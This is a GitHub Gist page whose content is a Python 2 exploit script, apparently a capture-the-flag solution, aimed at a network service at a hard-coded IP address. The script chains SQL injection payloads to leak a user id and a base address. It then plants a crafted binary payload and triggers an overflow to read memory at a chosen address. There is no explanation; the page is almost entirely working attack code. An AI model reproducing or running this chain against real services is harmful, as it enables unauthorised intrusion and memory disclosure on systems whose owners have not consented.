Instantly share code, notes, and snippets.

Embed
What would you like to do?
import random
import socket
import string
import sys
import time
from binascii import hexlify
from binascii import unhexlify
def make_address(offset, address):
return unhexlify("%016x" % (offset + address))[::-1]
def leak_data(address):
HOST = '88.198.89.199'
PORT = 1234
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.settimeout(2)
s.recv(1024)
# Generate user
username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])
# Register
s.sendall("register %s %s\n" % (username, username))
s.recv(1024)
# Login
s.sendall("login %s %s\n" % (username, username))
s.recv(1024)
# Leak userid
s.sendall("search x' union select id from users where name='%s'#\n" % (username))
s.recv(1024)
s.sendall("show 0\n")
userid = int(s.recv(1024)[3:])
# print "Userid: %d" % userid
# Leak base address
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
s.recv(1024)
s.sendall("show 11\n")
s.recv(4)
offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
# print "Base address: 0x%x" % offset
s.recv(1024)
# Add dummy value and payload
payload = '\x00' * 56 + '\x02' + '\x00' * 7
payload += make_address(offset, 0x223d)
payload += make_address(offset, 0x2238)
payload += make_address(offset, 0x2020)
payload += make_address(offset, address)
payload = hexlify(payload)
s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
s.recv(1024)
# Overflow payload to 0x203d68
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
s.recv(1024)
# Test
s.sendall("help\n")
s.recv(1024)
data = s.recv(1024)[115:]
print "Leaked: %s" % hexlify(data[:-1])
leak_data(int(sys.argv[1], 16))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment